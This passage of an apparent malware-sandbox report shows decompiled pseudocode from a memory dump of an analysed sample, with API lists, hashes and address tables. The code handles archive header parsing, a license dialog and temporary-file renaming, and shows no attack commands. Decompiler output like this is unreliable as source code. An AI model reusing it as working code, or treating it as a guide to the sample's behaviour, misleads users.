				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E009FD940();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E009EC39E(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E009EC39E(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E009EC39E(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E009EC39E(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E009EC39E(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E009EC39E(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E009EC39E(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E009EC251(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E009E3E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E009E3DEC(_t257, _t240 + 0x28, _t167);
												}
												E009EC300(_t318, _t240 + 0x10a1, 0x10);
												E009EC300(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E009EC300(_t318, _t240 + 0x10c2, 8);
													E009EC300(_t318, _t344 + 0x30, 4);
													E009EF524(_t344 + 0x58);
													E009EF56A(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E009EF435(_t344 + 0x5c);
													_t161 = E009FF3CA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E009FF3CA(_t325, 0xa12398, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E009E3E41(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E009E3DEC(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E009EC39E(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E009EC300(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E009EC39E(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E009F0A64(_t240 + 0x1040, _t315, E009EC2E0(_t278, __eflags), _t315);
													} else {
														E009F0A25(_t240 + 0x1040, _t315, E009EC29E(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E009F0A64(_t240 + 0x1048, _t315, E009EC2E0(_t275, __eflags), _t315);
													} else {
														E009F0A25(_t240 + 0x1048, _t315, E009EC29E(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E009F0A64(_t240 + 0x1050, _t315, E009EC2E0(_t272, __eflags), _t315);
													} else {
														E009F0A25(_t240 + 0x1050, _t315, E009EC29E(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E009EC29E(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E009F06D0(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E009EC29E(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E009F06D0(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E009EC29E(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E009F06D0(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E009EC39E(_t315);
												__eflags = E009EC39E(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E009E3E41(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E009EFA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E009EC39E(_t315);
											 *(_t240 + 0x2104) = E009EC39E(_t315) & 0x00000001;
											_t331 = E009EC39E(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E009EC300(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E009EB9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E009F1094();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E009EC39E(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E009EC39E(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E009EC300(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E009EC39E(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E009EC300(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E009EC39E(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E009EC39E(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E009E1EDE(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}





























































                            0x009e2011
                            0x009e2017
                            0x009e201e
                            0x009e2022
                            0x009e2027
                            0x009e2031
                            0x009e2688
                            0x009e268f
                            0x009e268f
                            0x009e2037
                            0x009e2039
                            0x009e203f
                            0x009e2046
                            0x009e204f
                            0x009e2051
                            0x009e2056
                            0x009e2058
                            0x009e205a
                            0x00000000
                            0x00000000
                            0x009e206d
                            0x009e2070
                            0x009e2072
                            0x00000000
                            0x00000000
                            0x009e2078
                            0x009e207a
                            0x00000000
                            0x009e208a
                            0x009e208a
                            0x009e208f
                            0x009e2093
                            0x009e2098
                            0x009e209b
                            0x009e209d
                            0x009e209f
                            0x009e20a1
                            0x009e20a5
                            0x009e20a9
                            0x00000000
                            0x009e20b9
                            0x009e20bd
                            0x009e20ce
                            0x009e20d2
                            0x009e20d7
                            0x009e20dd
                            0x009e20e1
                            0x009e20ea
                            0x009e2102
                            0x009e2104
                            0x009e2107
                            0x009e2107
                            0x009e210a
                            0x009e210a
                            0x009e2110
                            0x009e2114
                            0x009e211d
                            0x009e2135
                            0x009e2137
                            0x009e213a
                            0x009e213a
                            0x009e211d
                            0x009e213d
                            0x009e2141
                            0x009e2141
                            0x009e2149
                            0x009e2155
                            0x009e2157
                            0x00000000
                            0x009e2168
                            0x009e2168
                            0x009e216b
                            0x009e251a
                            0x009e251f
                            0x009e2521
                            0x009e2551
                            0x009e255f
                            0x009e2567
                            0x009e2572
                            0x009e2575
                            0x009e257b
                            0x009e257e
                            0x009e258d
                            0x009e2592
                            0x009e2596
                            0x009e259a
                            0x009e25a2
                            0x009e25a2
                            0x009e25b2
                            0x009e25c2
                            0x009e25c7
                            0x009e25ce
                            0x009e25d6
                            0x009e25df
                            0x009e25ed
                            0x009e25f7
                            0x009e2604
                            0x009e260d
                            0x009e2613
                            0x009e2624
                            0x009e2629
                            0x009e262e
                            0x009e2632
                            0x009e2636
                            0x009e263c
                            0x009e2646
                            0x009e264b
                            0x009e264e
                            0x009e2650
                            0x009e2652
                            0x009e2652
                            0x009e2650
                            0x009e263c
                            0x009e2658
                            0x009e265f
                            0x009e2669
                            0x009e2523
                            0x009e2530
                            0x009e2535
                            0x009e2539
                            0x009e253d
                            0x009e2545
                            0x009e2545
                            0x00000000
                            0x009e2521
                            0x009e2171
                            0x009e2174
                            0x009e24f3
                            0x009e24f8
                            0x009e24fa
                            0x00000000
                            0x00000000
                            0x009e2500
                            0x009e2508
                            0x009e2512
                            0x009e21c9
                            0x009e21cb
                            0x00000000
                            0x009e21cb
                            0x009e217a
                            0x009e217d
                            0x009e2374
                            0x009e2376
                            0x00000000
                            0x00000000
                            0x009e237c
                            0x009e2387
                            0x009e2389
                            0x009e238e
                            0x009e2392
                            0x009e2394
                            0x009e239a
                            0x009e239e
                            0x009e239e
                            0x009e23a1
                            0x009e23a5
                            0x009e23a7
                            0x009e23a9
                            0x009e23ab
                            0x009e23cf
                            0x009e23ad
                            0x009e23bb
                            0x009e23bb
                            0x009e23d4
                            0x009e23d8
                            0x009e23d8
                            0x009e23dc
                            0x009e23dc
                            0x009e23df
                            0x009e23e3
                            0x009e23e5
                            0x009e23e7
                            0x009e23e9
                            0x009e240d
                            0x009e23eb
                            0x009e23f9
                            0x009e23f9
                            0x009e23e9
                            0x009e2412
                            0x009e2418
                            0x009e2418
                            0x009e241b
                            0x009e241f
                            0x009e2421
                            0x009e2426
                            0x009e2428
                            0x009e244c
                            0x009e242a
                            0x009e2438
                            0x009e2438
                            0x009e2451
                            0x009e2451
                            0x009e2455
                            0x009e245a
                            0x009e2460
                            0x009e2462
                            0x009e2468
                            0x009e246d
                            0x009e2496
                            0x009e249b
                            0x009e246f
                            0x009e2471
                            0x009e2476
                            0x009e247b
                            0x009e2480
                            0x009e2482
                            0x009e2484
                            0x009e248f
                            0x009e248f
                            0x009e2484
                            0x009e24a0
                            0x009e24a5
                            0x009e24ae
                            0x009e24b0
                            0x009e24b2
                            0x009e24bd
                            0x009e24bd
                            0x009e24b2
                            0x009e24c2
                            0x009e24c7
                            0x009e24d4
                            0x009e24d6
                            0x009e24d8
                            0x009e24e7
                            0x009e24e7
                            0x009e24d8
                            0x009e24c7
                            0x009e2462
                            0x00000000
                            0x009e245a
                            0x009e237e
                            0x009e2381
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e2381
                            0x009e2183
                            0x009e2186
                            0x009e2317
                            0x009e2319
                            0x00000000
                            0x00000000
                            0x009e231f
                            0x009e232a
                            0x009e232c
                            0x009e2338
                            0x009e233a
                            0x009e234a
                            0x009e2354
                            0x009e2359
                            0x009e236a
                            0x009e236a
                            0x00000000
                            0x009e233a
                            0x009e2321
                            0x009e2324
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e2324
                            0x009e218c
                            0x009e218f
                            0x009e22a2
                            0x009e22b1
                            0x009e22bc
                            0x009e22be
                            0x009e22c6
                            0x009e22cc
                            0x009e22d9
                            0x009e22de
                            0x009e22de
                            0x009e22f4
                            0x009e22f9
                            0x009e2304
                            0x009e230c
                            0x009e230d
                            0x00000000
                            0x009e230d
                            0x009e2195
                            0x009e2198
                            0x009e21d7
                            0x009e21de
                            0x009e21e5
                            0x009e21ee
                            0x009e21fc
                            0x009e2202
                            0x009e2209
                            0x009e220d
                            0x009e220f
                            0x009e2218
                            0x009e221f
                            0x009e2221
                            0x009e2223
                            0x009e2223
                            0x009e2229
                            0x009e222e
                            0x009e2232
                            0x009e2232
                            0x009e2236
                            0x009e2238
                            0x009e2241
                            0x009e2248
                            0x009e224a
                            0x009e224c
                            0x009e224c
                            0x009e224f
                            0x009e2258
                            0x009e225d
                            0x009e225d
                            0x009e2261
                            0x009e2268
                            0x009e2271
                            0x009e2271
                            0x009e2277
                            0x009e227e
                            0x009e2287
                            0x009e2287
                            0x009e228d
                            0x00000000
                            0x009e228d
                            0x009e219d
                            0x00000000
                            0x00000000
                            0x009e21a7
                            0x009e21b5
                            0x009e21b5
                            0x009e21b8
                            0x009e21c1
                            0x009e21c6
                            0x009e21c7
                            0x00000000
                            0x009e21c7
                            0x009e2670
                            0x009e2670
                            0x009e2670
                            0x009e2674
                            0x009e267a
                            0x009e267f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e267f
                            0x009e2149
                            0x009e20a9
                            0x009e207a
                            0x009e2687

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: ;%u$x%u$xc%u
                            • API String ID: 0-2277559157
                            • Opcode ID: e67466ce22fe9a67d332c8a89ec6f3c42235fffd771bfb91f2e8c48744f9f7cf
                            • Instruction ID: 35d9671a5f0407ee99cf46e414c955e025d554d8b4d38ff011b0d87a16130e84
                            • Opcode Fuzzy Hash: e67466ce22fe9a67d332c8a89ec6f3c42235fffd771bfb91f2e8c48744f9f7cf
                            • Instruction Fuzzy Hash: B9F134716043C09BDB17EF268885BFE379E6FD0300F08496AF9858B287DA64DC45C762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FA3E1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E009FA3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				intOrPtr _t31;
				struct HWND__* _t35;
				intOrPtr _t36;
				void* _t37;
				struct HWND__* _t38;

				_t28 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				if(E009E12D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t37 = _t36 - 0x110;
				if(_t37 == 0) {
					E009FC343(__edx, __eflags, __fp0, _t35);
					_t9 =  *0xa2b704;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t35, 0x80, 1, _t9);
					}
					_t10 =  *0xa35d04;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xa3de1c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t35, _t11);
					}
					_t38 = GetDlgItem(_t35, 0x65);
					SendMessageW(_t38, 0x435, 0, 0x10000);
					SendMessageW(_t38, 0x443, 0,  *0xa1df40(0xf));
					 *0xa1df3c(_t35);
					_t31 =  *0xa275ec; // 0x0
					E009F8FE6(_t31, __eflags,  *0xa20064, _t38,  *0xa3de18, 0, 0);
					L00A02B4E( *0xa3de1c);
					L00A02B4E( *0xa3de18);
					goto L16;
				}
				if(_t37 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t35, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}













                            0x009fa3e2
                            0x009fa3e8
                            0x009fa3ef
                            0x009fa408
                            0x009fa4ee
                            0x009fa4f0
                            0x00000000
                            0x009fa4f0
                            0x009fa40e
                            0x009fa414
                            0x009fa441
                            0x009fa446
                            0x009fa451
                            0x009fa453
                            0x009fa45e
                            0x009fa45e
                            0x009fa460
                            0x009fa465
                            0x009fa467
                            0x009fa473
                            0x009fa473
                            0x009fa479
                            0x009fa47e
                            0x009fa480
                            0x009fa484
                            0x009fa484
                            0x009fa499
                            0x009fa4a1
                            0x009fa4b3
                            0x009fa4b6
                            0x009fa4bc
                            0x009fa4d1
                            0x009fa4dc
                            0x009fa4e7
                            0x00000000
                            0x009fa4ed
                            0x009fa419
                            0x009fa428
                            0x00000000
                            0x009fa428
                            0x009fa41e
                            0x009fa421
                            0x009fa43c
                            0x009fa430
                            0x009fa431
                            0x00000000
                            0x009fa431
                            0x009fa426
                            0x009fa42f
                            0x00000000
                            0x009fa42f
                            0x00000000

                            APIs
                              • Part of subcall function 009E12D7: GetDlgItem.USER32(00000000,00003021), ref: 009E131B
                              • Part of subcall function 009E12D7: SetWindowTextW.USER32(00000000,00A122E4), ref: 009E1331
                            • EndDialog.USER32(?,00000001), ref: 009FA431
                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 009FA45E
                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 009FA473
                            • SetWindowTextW.USER32(?,?), ref: 009FA484
                            • GetDlgItem.USER32(?,00000065), ref: 009FA48D
                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 009FA4A1
                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 009FA4B3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MessageSend$Item$TextWindow$Dialog
                            • String ID: LICENSEDLG
                            • API String ID: 3214253823-2177901306
                            • Opcode ID: f79d203be9b8197d818cea7080e515dcca18fa1919d9ccaf308378008aa898c2
                            • Instruction ID: d4dea12c0e667c9e53856ff19bc55561ce3542b57d3c023165ebae97175bc05c
                            • Opcode Fuzzy Hash: f79d203be9b8197d818cea7080e515dcca18fa1919d9ccaf308378008aa898c2
                            • Instruction Fuzzy Hash: 9221A3722442187BE611DBA5ED89F7B7B6CEB46B84F018014F705A61B0CBA69D039732
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9268, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E009E9268(void* __ecx) {
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t82;
				WCHAR* _t83;
				void* _t85;
				void* _t87;

				E009FD870(E00A11336, _t85);
				E009FD940();
				_t83 =  *(_t85 + 8);
				_t31 = _t85 - 0x4030;
				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t92 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *(_t85 + 8) = E009EB943(_t92, _t85 - 0x4030);
							_t78 = E009EB943(_t92, _t85 - 0x5030);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E009F1410( *(_t85 + 8), _t78);
								_t94 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E009F1410(E009EB943(_t94, _t83), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t85 - 0x100c) = _t41;
										_t79 = 0;
										while(1) {
											_t96 = _t41;
											if(_t41 != 0) {
												break;
											}
											E009EFAB1(_t85 - 0x100c, _t83, 0x800);
											E009E3E41(E009EB943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
											_t87 = _t87 + 0x10;
											if(E009E9E6B(_t85 - 0x100c) == 0) {
												_t41 =  *(_t85 - 0x100c);
											} else {
												_t41 = 0;
												 *(_t85 - 0x100c) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t99 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E009EFAB1(_t85 - 0x3030, _t83, 0x800);
										_push(0x800);
										E009EB9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
											goto L20;
										} else {
											E009E943C(_t85 - 0x2030);
											 *((intOrPtr*)(_t85 - 4)) = _t68;
											if(E009E9E6B(_t83) == 0) {
												_push(0x12);
												_push(_t83);
												_t68 = E009E9528(_t85 - 0x2030);
											}
											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
											if(_t68 != 0) {
												E009E94DA(_t85 - 0x2030);
												E009E9621(_t85 - 0x2030);
											}
											E009E946E(_t85 - 0x2030);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t32;
			}
















                            0x009e926d
                            0x009e9277
                            0x009e927e
                            0x009e9281
                            0x009e9290
                            0x009e9298
                            0x009e9427
                            0x009e9427
                            0x009e9427
                            0x009e92a6
                            0x009e92af
                            0x009e92b7
                            0x00000000
                            0x009e92bd
                            0x009e92bd
                            0x009e92bf
                            0x00000000
                            0x009e92c5
                            0x009e92d1
                            0x009e92e0
                            0x009e92e2
                            0x009e92e7
                            0x00000000
                            0x009e92ed
                            0x009e92f1
                            0x009e92f6
                            0x009e92f8
                            0x00000000
                            0x009e92fe
                            0x009e9306
                            0x009e930d
                            0x00000000
                            0x009e9313
                            0x009e9313
                            0x009e931a
                            0x009e931c
                            0x009e931c
                            0x009e931f
                            0x00000000
                            0x00000000
                            0x009e932e
                            0x009e934b
                            0x009e9350
                            0x009e9361
                            0x009e936e
                            0x009e9363
                            0x009e9363
                            0x009e9365
                            0x009e9365
                            0x009e9375
                            0x009e937e
                            0x00000000
                            0x009e9380
                            0x009e9380
                            0x009e9383
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e9383
                            0x00000000
                            0x009e937e
                            0x009e9397
                            0x009e939c
                            0x009e93a7
                            0x009e93c4
                            0x00000000
                            0x009e93c6
                            0x009e93cc
                            0x009e93d2
                            0x009e93dc
                            0x009e93de
                            0x009e93e0
                            0x009e93ec
                            0x009e93ec
                            0x009e93fc
                            0x009e9400
                            0x009e9408
                            0x009e9413
                            0x009e9413
                            0x009e941e
                            0x009e9423
                            0x009e9423
                            0x009e93c4
                            0x009e930d
                            0x009e92f8
                            0x009e92e7
                            0x009e92bf
                            0x009e92b7
                            0x009e9429
                            0x009e942f
                            0x009e9439

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E926D
                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 009E9290
                            • GetShortPathNameW.KERNEL32 ref: 009E92AF
                              • Part of subcall function 009F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,009EACFE,?,?,?,009EACAD,?,-00000002,?,00000000,?), ref: 009F1426
                            • _swprintf.LIBCMT ref: 009E934B
                              • Part of subcall function 009E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E3E54
                            • MoveFileW.KERNEL32(?,?), ref: 009E93C0
